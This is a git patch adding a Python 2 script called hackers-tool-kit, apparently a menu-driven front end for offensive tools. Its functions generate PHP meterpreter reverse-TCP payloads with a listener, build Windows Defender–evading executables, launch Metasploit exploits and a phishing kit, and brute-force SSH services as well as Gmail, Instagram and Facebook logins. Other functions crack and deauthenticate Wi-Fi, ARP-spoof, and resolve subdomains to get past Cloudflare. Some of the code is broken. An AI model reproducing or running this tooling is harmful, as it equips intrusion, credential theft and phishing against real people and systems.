md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - -#ABOUT ME / THE CREATOR START# -#----------------------------# -def about(): - print "\033[92m------------------------------------------------------------" - print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" - print "------------------------------------------------------------" - print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" - print "------------------------------------------------------------" - print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" - print "------------------------------------------------------------" - print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" - print "------------------------------------------------------------\033[0m" -#--------------------------# -#ABOUT ME / THE CREATOR END# - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - #msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=443 -o /root/phphack.php# - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "about": - about() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 9f1d45dd0da81207ae4bd775ffd51ba3168184bc Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Tue, 14 May 2019 22:08:18 +0100 Subject: [PATCH 123/214] Add files via upload --- htk.py | 2740 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2740 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..5c3ae9e --- /dev/null +++ b/htk.py @@ -0,0 +1,2740 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,7) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +about : about the creator / me +? : displays this message +clear : clears screen except for banner +clearall: clears everything on screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to 